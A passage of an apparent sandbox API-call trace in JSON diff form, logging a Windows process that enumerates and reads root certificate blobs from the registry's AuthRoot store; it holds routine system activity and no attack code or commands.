"id": 2059 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fc63b", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000590" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "Type", + "value": "3", + "pretty_value": "REG_BINARY" + }, + { + "name": "Information", + "value": "Y\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x16\\x00\\x00\\x00R\\x00S\\x00A\\x00/\\x00S\\x00H\\x00A\\x002\\x005\\x006\\x00\\x00\\x00\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00O\\xcb\\x14\\xf7\\xc4\\xa3\\x8f/&\\\\x1f\\x12\\xc9\\xafVw\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x00\\xbeR\\xe4a\\xb1}\\xd6%'q%\\x1bE\\xe9\\x8f\\x122\\xca\\xa1%\\x12\\xdcy\\x11\\x8d\\x0c_\\xces\\xa5M\\x95\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x00>\\x00\\x00\\x00H\\x00o\\x00t\\x00s\\x00p\\x00o\\x00t\\x00 \\x002\\x00.\\x000\\x00 \\x00T\\x00r\\x00u\\x00s\\x00t\\x00 \\x00R\\x00o\\x00o\\x00t\\x00 \\x00C\\x00A\\x00 \\x00-\\x00 \\x000\\x003\\x00\\x00\\x00b\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x00\\xa3\\xcchY]\\xfe~\\x86\\xd8\\xad\\x17r\\xa8\\xb5(J\\xddT\\xac\\xe3\\xb8\\xa7\\x98\\xdfG\\xbc\\xca\\xfb\\x1f\\xdb\\x84\\xdf\t\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x000\\x1e\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x01\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x02\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x04\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00g\\x0eI,a\\x17\\x9e\\xeb\\xed\\xe0T\\xe7\\x84\\xd9\\x9b\\xadd`se\\x1d\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00[\\xcb\\x93\\xea\\xdb}mO\\xb7\\xa0\n/:\\xe5\\x03\\x0c\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00QP\\x1f\\xbf\\xcei\\x18\\x9d`\\x9c\\xfa\\xf1@\\xc5vu]\\xcc\\x1f\\xdf\\x04\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xeb\\x15w\\xb4\\x0b<\\x8b\\xab\\xae4m\\xd9\\x8e\\xad\\x07\\x80\\\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x10\\x00\\x00 \\x00\\x00\\x00\\x01\\x00\\x00\\x00p\\x05\\x00\\x000\\x82\\x05l0\\x82\\x03T\\xa0\\x03\\x02\\x01\\x02\\x02\\x10\\x0c\\xb3\\x0fp\\xf2\\x86\\xa43\\xe0\\xb9\t\\x89\\xde\\x01\\xed\\xb70\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x0b\\x05\\x000P1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x180\\x16\\x06\\x03U\\x04\n\\x13\\x0fWFA Hotspot 2.01'0%\\x06\\x03U\\x04\\x03" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\51501FBFCE69189D609CFAF140C576755DCC1FDF\\Blob" + } + ], + "repeated": 0, + "id": 2060 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f2b77", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000590" + } + ], + "repeated": 0, + "id": 2061 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fd269", + "parentcaller": "0x756ac71b", + "category": "registry", + "api": "NtEnumerateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000058c" + }, + { + "name": "Index", + "value": "3" + } + ], + "repeated": 0, + "id": 2062 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000590" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000058c" + }, + { + "name": "ObjectAttributesName", + "value": "73A5E64A3BFF8316FF0EDCCC618A906E4EAE4D74" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\73A5E64A3BFF8316FF0EDCCC618A906E4EAE4D74" + } + ], + "repeated": 0, + "id": 2063 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffff80000005", + "pretty_return": "BUFFER_OVERFLOW", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000590" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\73A5E64A3BFF8316FF0EDCCC618A906E4EAE4D74\\Blob" + } + ], + "repeated": 1, + "id": 2064 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fc63b", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000590" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "Type", + "value": "3", + "pretty_value": "REG_BINARY" + }, + { + "name": "Information", + "value": "\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x10\\x9ds\\x93y;\\xca2@1u\\xdc\\x12~\\x0e\\xc1\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00s\\xa5\\xe6J;\\xff\\x83\\x16\\xff\\x0e\\xdc\\xcca\\x8a\\x90nN\\xaeMti\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0e\\x00\\x00\\x000\\x0c\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x03\\x01\\x1d\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00r\\xa4\\x91\\x950\\x9f\\xb94\\xd6\n\\x98\\xe4\\xecE\\x1al\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\t\\xcbY\\x7f\\x86\\xb2p\\x8f\\x1a\\xc39\\xe3\\xc0\\xd9\\xe9\\xbf\\xbbM\\xb2#\t\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x16\\x00\\x00\\x000\\x14\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x02\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x01b\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x00\\xc7A\\xf7\\x0fK*\\x8d\\x88\\xbf.q\\xc1A\"\\xefS\\xef\\x10\\xeb\\xa0\\xcf\\xa5\\xe6L\\xfa \\xf4\\x18\\x850s\\xe0\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\\\x00\\x00\\x00M\\x00i\\x00c\\x00r\\x00o\\x00s\\x00o\\x00f\\x00t\\x00 \\x00R\\x00S\\x00A\\x00 \\x00R\\x00o\\x00o\\x00t\\x00 \\x00C\\x00e\\x00r\\x00t\\x00i\\x00f\\x00i\\x00c\\x00a\\x00t\\x00e\\x00 \\x00A\\x00u\\x00t\\x00h\\x00o\\x00r\\x00i\\x00t\\x00y\\x00 \\x002\\x000\\x001\\x007\\x00\\x00\\x00\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x000\\x00\\x00\\x00A3\\xc4\\xe6\\x0f\\xa1\\x83\\xee^zD\\x16\\xc5\\xd5L3\\x92\\xc5l/W()\\xbfY4tg\\xba\\xb0{\\xcd\\xcf\\x84\\x01b\\x98\\x83A\\xd2\\xd2\\x84\\xfb\\xd8V\\xdfS\\xb1 \\x00\\x00\\x00\\x01\\x00\\x00\\x00\\xac\\x05\\x00\\x000\\x82\\x05\\xa80\\x82\\x03\\x90\\xa0\\x03\\x02\\x01\\x02\\x02\\x10\\x1e\\xd3\\x97\t_\\xd8\\xb4\\xb3Gp\\x1e\\xaa\\xbe\\x7fE\\xb30\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x0c\\x05\\x000e1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x1e0\\x1c\\x06\\x03U\\x04\n\\x13\\x15Microsoft Corporation1604\\x06\\x03U\\x04\\x03\\x13-Microsof" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\73A5E64A3BFF8316FF0EDCCC618A906E4EAE4D74\\Blob" + } + ], + "repeated": 0, + "id": 2065 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f2b77", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000590" + } + ], + "repeated": 0, + "id": 2066 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fd269", + "parentcaller": "0x756ac71b", + "category": "registry", + "api": "NtEnumerateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000058c" + }, + { + "name": "Index", + "value": "4" + } + ], + "repeated": 0, + "id": 2067 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000590" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000058c" + }, + { + "name": "ObjectAttributesName", + "value": "742C3192E607E424EB4549542BE1BBC53E6174E2" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\742C3192E607E424EB4549542BE1BBC53E6174E2" + } + ], + "repeated": 0, + "id": 2068 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffff80000005", + "pretty_return": "BUFFER_OVERFLOW", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000590" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\742C3192E607E424EB4549542BE1BBC53E6174E2\\Blob" + } + ], + "repeated": 1, + "id": 2069 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fc63b", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000590" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "Type", + "value": "3", + "pretty_value": "REG_BINARY" + }, + { + "name": "Information", + "value": "\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xd7\\xc6;\\xe0\\x83}\\xba\\xbf\\x88\\x1dO\\xbf_\\x98j\\xd8\\x04\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x10\\xfcc]\\xf6&>\r\\xf3%\\xbe_y\\xcdgg\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x00F\\x00\\x00\\x00V\\x00e\\x00r\\x00i\\x00S\\x00i\\x00g\\x00n\\x00 \\x00C\\x00l\\x00a\\x00s\\x00s\\x00 \\x003\\x00 \\x00P\\x00u\\x00b\\x00l\\x00i\\x00c\\x00 \\x00P\\x00r\\x00i\\x00m\\x00a\\x00r\\x00y\\x00 \\x00C\\x00A\\x00\\x00\\x00\t\\x00\\x00\\x00\\x01\\x00\\x00\\x00*\\x00\\x00\\x000(\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x04\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x02\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x03\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x01\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\xe2\\x7f{\\xd8w\\xd5\\xdf\\x9e\n?\\x9e\\xb4\\xcb\\x0e.\\xa9\\xef\\xdbiw\\x1d\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00'\\xb3Qvg3\\x1c\\xe2\\xc1\\xe7@\\x02\\xb5\\xff\"\\x98\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00t,1\\x92\\xe6\\x07\\xe4$\\xebEIT+\\xe1\\xbb\\xc5>at\\xe2\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x91\\x16\\x1b\\x89K\\x11~\\xcd\\xc2Wb\\x8d\\xb4`\\xcc\\x04 \\x00\\x00\\x00\\x01\\x00\\x00\\x00@\\x02\\x00\\x000\\x82\\x02<0\\x82\\x01\\xa5\\x02\\x10p\\xba\\xe4\\x1d\\x10\\xd9)4\\xb68\\xca{\\x03\\xcc\\xba\\xbf0\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x02\\x05\\x000_1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x170\\x15\\x06\\x03U\\x04\n\\x13\\x0eVeriSign, Inc.1705\\x06\\x03U\\x04\\x0b\\x13.Class 3 Public Primary Certification Authority0\\x1e\\x17\r960129000000Z\\x17\r280801235959Z0_1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x170" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\742C3192E607E424EB4549542BE1BBC53E6174E2\\Blob" + } + ], + "repeated": 0, + "id": 2070 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f2b77", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000590" + } + ], + "repeated": 0, + "id": 2071 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fd269", + "parentcaller": "0x756ac71b", + "category": "registry", + "api": "NtEnumerateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000058c" + }, + { + "name": "Index", + "value": "5" + } + ], + "repeated": 0, + "id": 2072 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000590" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000058c" + }, + { + "name": "ObjectAttributesName", + "value": "7E04DE896A3E666D00E687D33FFAD93BE83D349E" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\7E04DE896A3E666D00E687D33FFAD93BE83D349E" + } + ], + "repeated": 0, + "id": 2073 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffff80000005", + "pretty_return": "BUFFER_OVERFLOW", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000590" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\7E04DE896A3E666D00E687D33FFAD93BE83D349E\\Blob" + } + ], + "repeated": 1, + "id": 2074 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fc63b", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000590" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "Type", + "value": "3", + "pretty_value": "REG_BINARY" + }, + { + "name": "Information", + "value": "\\\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x80\\x01\\x00\\x00\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xb0\t\\xe9\\x9a\\\\xfc\\x92\\x8a\\x171\\x90\\x10m\\xbb2\\xa9\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00~\\x04\\xde\\x89j>fm\\x00\\xe6\\x87\\xd3?\\xfa\\xd9;\\xe8=4\\x9e\\x1d\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xd0\\xab9\\xed\\xd1\\xa4\\xd8\\x9aU\\x12\\x88-\\xeb\t\\xcb\\x13\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\xb3\\xdbH\\xa4\\xf9\\xa1\\xc5\\xd8\\xae6A\\xcc\\x11cib)\\xbcK\\xc6b\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x001\\xadfH\\xf8\\x10A8\\xc78\\xf3\\x9e\\xa42\\x0139>:\\x18\\xcc\\x02)n\\xf9|*\\xc9\\xefg1\\xd0\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x000\\x00\\x00\\x00D\\x00i\\x00g\\x00i\\x00C\\x00e\\x00r\\x00t\\x00 \\x00G\\x00l\\x00o\\x00b\\x00a\\x00l\\x00 \\x00R\\x00o\\x00o\\x00t\\x00 \\x00G\\x003\\x00\\x00\\x00\t\\x00\\x00\\x00\\x01\\x00\\x00\\x004\\x00\\x00\\x0002\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x02\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x03\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x04\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x01\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x08S\\x00\\x00\\x00\\x01\\x00\\x00\\x00@\\x00\\x00\\x000>0\\x1f\\x06\t`\\x86H\\x01\\x86\\xfdl\\x02\\x010\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc00\\x1b\\x06\\x05g\\x81\\x0c\\x01\\x030\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc0\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x000\\x00\\x00\\x00\\x82\\xc8\\x01\\x999w\"\\xb5z\\xd4s\\xea&k\\x93\\xd4\\x7f\\xfcw\\xfe\\x07\\xf0\\x93\\x884_ \\xda\\xb6\\xad\\xdd\\x08vr\\xf9\\x88\\xb4\\xbb\\xfd\\x15LK\\x130\\x1f\\x06\t`\\x86H\\x01\\x86\\xfdl\\x02\\x010\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc00\\x1b\\x06\\x05g\\x81\\x0c\\x01\\x030\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc0\\\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x0f:\\x05'\\xd2B\\xde-\\xc9\\x8e\\\\xfc\\xb1\\xe9\\x91\\xee \\x00\\x00\\x00\\x01\\x00\\x00\\x00\\xb3\\x03\\x00\\x000\\x82\\x03\\xaf0\\x82\\x02\\x97\\xa0\\x03\\x02\\x01\\x02\\x02\\x10\\x08;\\xe0V\\x90BF\\xb1\\xa1uj\\xc9Y\\x91\\xc7J0\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x05\\x05\\x00" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\\Blob" + } + ], + "repeated": 0, + "id": 2080 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f2b77", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000590" + } + ], + "repeated": 0, + "id": 2081 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fd269", + "parentcaller": "0x756ac71b", + "category": "registry", + "api": "NtEnumerateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000058c" + }, + { + "name": "Index", + "value": "7" + } + ], + "repeated": 0, + "id": 2082 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000590" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000058c" + }, + { + "name": "ObjectAttributesName", + "value": "B1BC968BD4F49D622AA89A81F2150152A41D829C" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\B1BC968BD4F49D622AA89A81F2150152A41D829C" + } + ], + "repeated": 0, + "id": 2083 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffff80000005", + "pretty_return": "BUFFER_OVERFLOW", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000590" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\B1BC968BD4F49D622AA89A81F2150152A41D829C\\Blob" + } + ], + "repeated": 1, + "id": 2084 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fc63b", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000590" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "Type", + "value": "3", + "pretty_value": "REG_BINARY" + }, + { + "name": "Information", + "value": "\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xa8#\\xb4\\xa2\\x01\\x80\\xbe\\xb4`\\xca\\xb9U\\xc2M~!\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\xb1\\xbc\\x96\\x8b\\xd4\\xf4\\x9db*\\xa8\\x9a\\x81\\xf2\\x15\\x01R\\xa4\\x1d\\x82\\x9c~\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x04+\\xebw\\xd5\\x01z\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0c\\x00\\x00\\x000\n\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\t\\x7f\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0c\\x00\\x00\\x000\n\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\t\\x1d\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00n\\xe7\\xf3\\xb0`\\xd1\\x0e\\x90\\xa3\\x1b\\xa3G\\x1b\\x99\\x926\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00`{f\\x1aE\r\\x97\\xca\\x89P/}\\x04\\xcd4\\xa8\\xff\\xfc\\xfdKb\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x00\\xeb\\xd4\\x10@\\xe4\\xbb>\\xc7B\\xc9\\xe3\\x81\\xd3\\x1e\\xf2\\xa4\\x1aH\\xb6h\\\\x96\\xe7\\xce\\xf3\\xc1\\xdfl\\xd43\\x1c\\x99\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x000\\x00\\x00\\x00G\\x00l\\x00o\\x00b\\x00a\\x00l\\x00S\\x00i\\x00g\\x00n\\x00 \\x00R\\x00o\\x00o\\x00t\\x00 \\x00C\\x00A\\x00 \\x00-\\x00 \\x00R\\x001\\x00\\x00\\x00S\\x00\\x00\\x00\\x01\\x00\\x00\\x00@\\x00\\x00\\x000>0\\x1f\\x06\t+\\x06\\x01\\x04\\x01\\xa02\\x01\\x010\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc00\\x1b\\x06\\x05g\\x81\\x0c\\x01\\x030\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc0\t\\x00\\x00\\x00\\x01\\x00\\x00\\x00h\\x00\\x00\\x000f\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x02\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x03\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x03\\x04\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x04\\x06\\x08+\\x06\\x01\\x05\\x05\\x08\\x02\\x02\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x06\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x07\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\t\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x01\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x08\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00Zm\\x07\\xb67\\x1d\\x96j/\\xb6\\xba\\x92\\x82\\x8c\\xe5Q" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\B1BC968BD4F49D622AA89A81F2150152A41D829C\\Blob" + } + ], + "repeated": 0, + "id": 2085 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f2b77", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000590" + } + ], + "repeated": 0, + "id": 2086 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fd269", + "parentcaller": "0x756ac71b", + "category": "registry", + "api": "NtEnumerateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000058c" + }, + { + "name": "Index", + "value": "8" + } + ], + "repeated": 0, + "id": 2087 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000590" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": 